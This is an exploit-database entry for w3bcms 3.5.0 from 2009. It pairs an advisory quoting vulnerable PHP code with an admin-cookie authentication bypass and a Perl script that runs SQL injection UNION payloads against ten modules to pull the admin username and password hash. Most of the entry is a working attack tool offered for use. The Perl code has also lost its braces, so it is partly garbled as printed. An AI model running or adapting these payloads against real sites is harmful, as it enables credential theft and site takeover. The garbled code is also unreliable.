w3bcms 3.5.0 - Multiple Vulnerabilities












use LWP::UserAgent;
use HTTP::Request::Common qw(POST);
use Getopt::Long;

#                            \#'#/
#                            (-.-)
#    -------------------oOO---(_)---OOo------------------
#    |           __             __                      |
#    |     _____/ /_____ ______/ /_  __  ______ ______  |
#    |    / ___/ __/ __ `/ ___/ __ \/ / / / __ `/ ___/  |
#    |   (__  ) /_/ /_/ / /  / /_/ / /_/ / /_/ (__  )   |
#    |  /____/\__/\__,_/_/  /_.___/\__,_/\__, /____/    |
#    |  Security Research Division      /____/ 2oo9     |
#    ----------------------------------------------------
#    | w3bcms <= v3.5.0 Multiple Remote Vulnerabilities |
#    |        (requires magic_quotes_gpc = Off)         |
#    ----------------------------------------------------
# [!] Discovered.: DNX
# [!] Vendor.....: http://www.w3bcms.de
# [!] Detected...: 11.01.2009
# [!] Reported...: 17.01.2009
# [!] Response...: 19.01.2009
# [!] Background.: CMS features in the frontend:
#                  » Ausgabe angelegter Seiten
#                  » Integrierter sicherer Spamschutz (kein Captcha!)
#                  » CMS Features wie Slogan Rotation, Datumausgabe, Seitenanzeige
#                  » Integrierter Besuchercounter (versteckt/sichtbar)
#               <b>» Sicherheit gegen Hackangriffe</b>
#                  » Schnelle Datenbankabfragen
#                  » 100% Suchmaschinenoptimiert (SEO)
#                  » Erweiterbar durch Module & Addons
#                  » Unterstützt Mod Rewrite URL's (optional)
# [!] Info.......: Insecure Cookie Handling in Admin Backend Login
# [!] Bug........: $_COOKIE["cms_admin"] in admin/index.php near line 67
#                  67: if ($_COOKIE["cms_admin"] != "") {
#                  68: 
#                  69:         $admin = mysql_fetch_assoc(mysql_query("SELECT * FROM admin WHERE cookie='".$_COOKIE["cms_admin"]."'"));
#                  70: 
#                  71:         if ($admin['benutzername'] != "") {
#                  72: 
#                  73:                 $_SESSION['login'] = true;
#                  74:                 header("Location: inc/index.php?seite=uebersicht");
#                  75:                 exit;
#                  76: 
#                  77:         }
#                  78: 
#                  79: }
# [!] PoC........: javascript:document.cookie = "cms_admin=' or '1'='1; path=/";
# [!] Info.......: Downloads module v1.5.0
# [!] Bug........: $_GET['id'] in includes/module/downloads/index.inc.php near line 15
#                  15: if (isset($_GET['action']) && $_GET['action'] == "klick") {
#                  16: 
#                  17:         $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_downloads WHERE id='".$_GET['id']."'"));
#                  18:         mysql_query("UPDATE modul_downloads SET klicks=klicks+1 WHERE id='".$_GET['id']."'");
#                  19:         $url = preg_replace('(%PAGE_DIR%)', $settings['page_dir'], $data['url']);
#                  20:         header("Location: ".$url."");
#                  21:         exit;
#                  22: 
#                  23: }
# [!] Info.......: News module v1.5.0
# [!] Bug........: $_GET['action'] in includes/module/news/index.inc.php near line 131
#                  131: $kcheck = eregi ("kommentar", $_GET['action']);
#                  135: if ($kcheck == "1") {
#                  136: 
#                  137:         $str = $_GET['action'];
#                  138:         $explode = explode(".",$str);
#                  139: 
#                  140:         $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_news WHERE id='".$explode[0]."' AND status='0'"));
# [!] Info.......: Portfolio module v2.0.0
# [!] Bug........: $_GET['action'] in includes/module/portfolio/index.inc.php near line 75
#                  75: $kcheck = eregi ("show", $_GET['action']);
#                  76: 
#                  77: if ($kcheck == "1") {
#                  78: 
#                  79:         $str = $_GET['action'];
#                  80:         $explode = explode(".",$str);
#                  81: 
#                  82:         $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_portfolio WHERE id='".$explode[0]."'"));
# [!] Info.......: Partner module v1.5.0
# [!] Bug........: $_GET['id'] in includes/module/partner/index.inc.php near line 15
#                  15: if (isset($_GET['action']) && $_GET['action'] == "klick") {
#                  16: 
#                  17:         $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_partner WHERE id='".$_GET['id']."'"));
#                  18:         mysql_query("UPDATE modul_partner SET klicks=klicks+1 WHERE id='".$_GET['id']."'");
#                  19: 
#                  20:         header("Location: ".$data['url']."");
#                  21:         exit;
#                  22: 
#                  23: }
# [!] Info.......: Mediathek module v1.5.0
# [!] Bug........: $_GET['id'] in includes/module/mediathek/index.inc.php near line 15
#                  15: if (isset($_GET['action']) && $_GET['action'] == "klick") {
#                  16: 
#                  17:         $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_mediathek WHERE id='".$_GET['id']."'"));
#                  18:         mysql_query("UPDATE modul_mediathek SET klicks=klicks+1 WHERE id='".$_GET['id']."'");
#                  19: 
#                  20:         $mediafile = $settings['page_dir']."/includes/media/".$data['mediafile'];
#                  21:
#                  22:         header("Location: ".$mediafile."");
#                  23:         exit;
#                  24:
#                  25: }
# [!] Info.......: Sitemap module v1.5.0
# [!] Bug........: $_GET['seite'] in includes/module/sitemap/index.inc.php near line 15
#                  15: $explode = explode(".",$_GET['seite']);
#                  19: $menu = mysql_query("SELECT * FROM pages WHERE submenu='0' AND aktiv='0' AND hidden='0' AND id!='".$explode['0']."' ORDER by sortierung");
# [!] Info.......: Links module v1.5.0
# [!] Bug........: $_GET['id'] in includes/module/links/index.inc.php near line 15
#                  15: if (isset($_GET['action']) && $_GET['action'] == "klick") {
#                  16: 
#                  17:         $data = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_links WHERE id='".$_GET['id']."'"));
#                  18:         mysql_query("UPDATE modul_links SET klicks=klicks+1 WHERE id='".$_GET['id']."'");
#                  19:         header("Location: ".$data['url']."");
#                  20:         exit;
#                  21: 
#                  22: }
# [!] Info.......: Blog module v1.5.0
# [!] Bug........: $_GET['action'] in includes/module/blog/index.inc.php near line 133
#                  131: $kcheck = eregi ("kommentar", $_GET['action']);
#                  135: if ($kcheck == "1") {
#                  136: 
#                  137:         $str = $_GET['action'];
#                  138:         $explode = explode(".",$str);
#                  139: 
#                  140:         $ausgabe = mysql_fetch_assoc(mysql_query("SELECT * FROM modul_blog WHERE id='".$explode[0]."' AND status='0'"));
# [!] Info.......: Suche module v1.5.0
# [!] Bug........: $_POST['suchbegriff'] in includes/module/suche/index.inc.php near line 66
#                  66: $eingabe = trim(strip_tags($_POST['suchbegriff']));
#                  67: $eingabe_array = explode(" ", $eingabe);
#                  68: $eingabe_array = array_unique($eingabe_array);
#                  69: 
#                  70: if ($eingabe == "" || $_POST['suchbegriff'] == "Suchbegriff(e) ..."){
#                  71: 
#                  72:         echo "<p>Fehler - Bitte <b>mindestens ein Suchbegriff</b> eingegeben!</p>";
#                  73: 
#                  74: } else {
#                  78:         $query_pages = "SELECT id, titel, inhalt, page FROM pages WHERE ";
#                  79: 
#                  80:         for ($i=0; $i<count($eingabe_array); $i++) {
#                  81: 
#                  82:                 $query_pages .= "((titel LIKE '%" . $eingabe_array[$i] . "%') OR (inhalt LIKE '%" . $eingabe_array[$i] . "%'))";
#                  83: 
#                  84:                 if ($i<count($eingabe_array)-1){
#                  85: 
#                  86:                         $query_pages .= " AND ";
#                  87: 
#                  88:                 }
#                  89: 
#                  90:                 $query_pages .= "AND type!='modul' AND type!='extern' AND inhalt!='' AND aktiv='0'";
#                  91: 
#                  92:         }
#                  93: 
#                  94:         $num_rows_pages = @mysql_num_rows(mysql_query($query_pages));
#                  95:         $result_pages = @mysql_query($query_pages);
# [!] Info.......: Gallery module v1.5.0
# [!] Bug........: $_GET['action'] in includes/module/gallery/index.inc.php near line 314
#                  314: } else if ($locate == "1" && isset($_GET['action']) && isset($_GET['id']) && $_GET['id'] != "") {
#                  320:         $explode = explode(".",$_GET['action']);
#                  324:         $album = mysql_query("SELECT * FROM modul_gallery WHERE album_id='".$explode[0]."' ORDER by id ".$sqlorder." LIMIT $zeige,$trefferproseite");
# [!] Solution...: Upgrade to v3.5.1 or higher and update all modules

  print "\n                          \\#'#/                       ";
  print "\n                          (-.-)                        ";
  print "\n   ------------------oOO---(_)---OOo-------------------";
  print "\n   | w3bcms <= v3.5.0 Multiple Remote Vulnerabilities |";
  print "\n   |                  coded by DNX                    |";
  print "\n   ----------------------------------------------------";
  print "\n[!] Usage: perl w3blabor.pl [Target] <Options>";
  print "\n[!] Example: perl w3blabor.pl -1 -u \"\"";
  print "\n[!] Targets:";
  print "\n       -1              Exploit over Downloads module v1.5.0";
  print "\n       -2              Exploit over News module v1.5.0";
  print "\n       -3              Exploit over Portfolio module v2.0.0";
  print "\n       -4              Exploit over Partner module v1.5.0";
  print "\n       -5              Exploit over Mediathek module v1.5.0";
  print "\n       -6              Exploit over Sitemap module v1.5.0";
  print "\n       -7              Exploit over Links module v1.5.0";
  print "\n       -8              Exploit over Blog module v1.5.0";
  print "\n       -9              Exploit over Suche module v1.5.0";
  print "\n       -10             Exploit over Gallery module v1.5.0";
  print "\n[!] Options:";
  print "\n       -u [url]        URL to vuln website";
  print "\n       -p [ip:port]    Proxy support";
  print "\n";

my $ua       = LWP::UserAgent->new();
my $response = "";
my %options  = ();
GetOptions(\%options, "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "u=s", "p=s");

if($options{"p"}) { $ua->proxy('http', "http://".$options{"p"}); }

if($options{"1"}) { use_download_bug(); }
elsif($options{"2"}) { use_news_bug(); }
elsif($options{"3"}) { use_portfolio_bug(); }
elsif($options{"4"}) { use_partner_bug(); }
elsif($options{"5"}) { use_mediathek_bug(); }
elsif($options{"6"}) { use_sitemap_bug(); }
elsif($options{"7"}) { use_links_bug(); }
elsif($options{"8"}) { use_blog_bug(); }
elsif($options{"9"}) { use_suche_bug(); }
elsif($options{"10"}) { use_gallery_bug(); }

sub use_download_bug
  my $url_user = $options{"u"};
  my $url_pass = $options{"u"};
  my $exploit_user = "id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*";
  my $exploit_pass = "id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*";
  $url_user =~ s/id=\d+/$exploit_user/i;
  $response = $ua->get($url_user);
  $response->base =~ /.*\/(.*?)$/;
  my $user = $1;
  $url_pass =~ s/id=\d+/$exploit_pass/i;
  $response = $ua->get($url_pass);
  $response->base =~ /.*\/(.*?)$/;
  my $pass = $1;  
  print $user.":".$pass;

sub use_news_bug
  my $url = $options{"u"};
  my $exploit = "action='%20union%20select%201,2,3,4,benutzername,6,passwort%20from%20admin%20limit%201/*";
  $url =~ s/action=\d+/$exploit/i;
  $response = $ua->get($url);
  if($response->content =~ /<p class="titel">(.*?)<\/p>.*([a-fA-F0-9]{32})<\/div>/s)
    print $1.":".$2;

sub use_portfolio_bug
  my $url = $options{"u"};
  my $exploit = "action='%20union%20select%201,2,passwort,benutzername,5,6,7,8,9,10,11,12,13,14,15,16%20from%20admin%20limit 1/*";
  $url =~ s/action=\d+/$exploit/i;
  $response = $ua->get($url);
  if($response->content =~ /<h1>([a-fA-F0-9]{32})<\/h1>.*?<p align="justify">(.*?)<\/p>/s)
    print $2.":".$1;

sub use_partner_bug
  my $url_user = $options{"u"};
  my $url_pass = $options{"u"};
  my $exploit_user = "id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*";
  my $exploit_pass = "id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*";
  $url_user =~ s/id=\d+/$exploit_user/i;
  $response = $ua->get($url_user);
  $response->base =~ /.*\/(.*?)$/;
  my $user = $1;
  $url_pass =~ s/id=\d+/$exploit_pass/i;
  $response = $ua->get($url_pass);
  $response->base =~ /.*\/(.*?)$/;
  my $pass = $1;  
  print $user.":".$pass;

sub use_mediathek_bug
  my $url_user = $options{"u"};
  my $url_pass = $options{"u"};
  my $exploit_user = "id='%20union%20select 1,2,benutzername,4%20from%20admin%20limit%201/*";
  my $exploit_pass = "id='%20union%20select 1,2,passwort,4%20from%20admin%20limit%201/*";
  $url_user =~ s/id=\d+/$exploit_user/i;
  $response = $ua->get($url_user);
  $response->base =~ /.*\/(.*?)$/;
  my $user = $1;
  $url_pass =~ s/id=\d+/$exploit_pass/i;
  $response = $ua->get($url_pass);
  $response->base =~ /.*\/(.*?)$/;
  my $pass = $1;  
  print $user.":".$pass;

sub use_sitemap_bug
  my $url = $options{"u"};
  $url =~ /seite=(\d+)\./;
  my $id = $1;
  my $exploit = "seite=".$id."'%20union%20select%201,benutzername,passwort,4,5,6,7,8,9,10,11,12,13,14,15%20from%20admin%20/*";
  $url =~ s/seite=\d+/$exploit/i;
  $response = $ua->get($url);
  if($response->content =~ /<strong>$id\.<\/strong>.*?<a href="index\.php\?seite=1\.(.*?)" title="(.*?)"/s)
    print $1.":".$2;

sub use_links_bug
  my $url_user = $options{"u"};
  my $url_pass = $options{"u"};
  my $exploit_user = "id='%20union%20select 1,2,benutzername,4,5%20from%20admin%20limit%201/*";
  my $exploit_pass = "id='%20union%20select 1,2,passwort,4,5%20from%20admin%20limit%201/*";
  $url_user =~ s/id=\d+/$exploit_user/i;
  $response = $ua->get($url_user);
  $response->base =~ /.*\/(.*?)$/;
  my $user = $1;
  $url_pass =~ s/id=\d+/$exploit_pass/i;
  $response = $ua->get($url_pass);
  $response->base =~ /.*\/(.*?)$/;
  my $pass = $1;  
  print $user.":".$pass;

sub use_blog_bug
  my $url = $options{"u"};
  my $exploit = "action='%20union%20select%201,2,3,4,benutzername,6,passwort%20from%20admin%20limit%201/*";
  $url =~ s/action=\d+/$exploit/i;
  $response = $ua->get($url);
  if($response->content =~ /<p class="titel">(.*?)<\/p>.*([a-fA-F0-9]{32})<\/div>/s)
    print $1.":".$2;

sub use_suche_bug
  my $url = $options{"u"}."&action=senden";
  my $search = "###___###%'))/**/union/**/select/**/1,benutzername,passwort,4/**/from/**/admin/*";
  my $req = POST $url, [suchbegriff => $search];
  my $response = $ua->request($req);
  if($response->content =~ /.*">(.*?)<\/a><br \/>([a-fA-F0-9]{32}) \[/s)
    print $1.":".$2;

sub use_gallery_bug
  my $url = $options{"u"};
  my $exploit = "action='%20union%20select%201,2,passwort,4,benutzername,6%20from%20admin/*";
  $url =~ s/action=\d+/$exploit/i;
  $response = $ua->get($url);
  my @content = split(/\n/, $response->content);
  foreach (@content)
    if($_ =~ /\/([a-fA-F0-9]{32})" rel="lytebox\[.*?\]" title="(.*?)"/)
      print $2.":".$1."\n";

# milw0rm.com [2009-02-09]